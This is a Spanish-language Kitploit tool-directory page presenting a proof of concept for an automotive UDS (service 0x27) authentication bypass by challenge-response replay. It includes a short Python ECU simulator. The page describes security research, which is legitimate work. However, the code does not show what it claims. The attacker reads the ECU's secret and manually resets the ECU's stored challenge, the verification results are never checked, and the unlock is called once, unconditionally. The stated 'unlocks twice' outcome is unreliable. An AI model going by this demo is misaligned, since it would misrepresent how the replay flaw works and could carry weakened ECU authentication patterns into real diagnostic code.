Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Exploit de prueba de concepto que demuestra el bypass de autenticación UDS mediante replay de desafío-respuesta en ECUs automotrices, con simulador Python CAN-UDS. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Autenticación y AutorizaciónSeguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Hardware e IoT
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Exploit de prueba de concepto que demuestra el bypass de autenticación UDS mediante replay de desafío-respuesta en ECUs automotrices, con simulador Python CAN-UDS.

Ver Repositorio
1hace 15 díasAún no revisado
Compartir

CVE-2026-23004 – Omisión de autenticación UDS en automoción mediante ataque de repetición

Código del programa (simulador Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Omisión de autenticación UDS en automoción mediante repetición

Severity: High

Resumen

Una ECU de automoción implementa el acceso de seguridad de los Servicios de Diagnóstico Unificados (UDS) (servicio 0x27), pero no impone el uso de un desafío de un solo uso. Un atacante puede capturar un par desafío‑respuesta válido y repetirlo para omitir la autenticación.

Detalles de la vulnerabilidad

  • Tipo: Ataque de repetición
  • Impacto: Programación no autorizada de la ECU, anulación de funciones de seguridad.
  • Causa raíz: La ECU acepta cualquier respuesta que coincida con el desafío actual, pero el mismo desafío puede reutilizarse sin invalidación.

Demostración del exploit

Ejecute la simulación:

root@kitploit:~
python uds_sim.py

La ECU se desbloquea dos veces con el mismo par de autenticación.

Descargar herramienta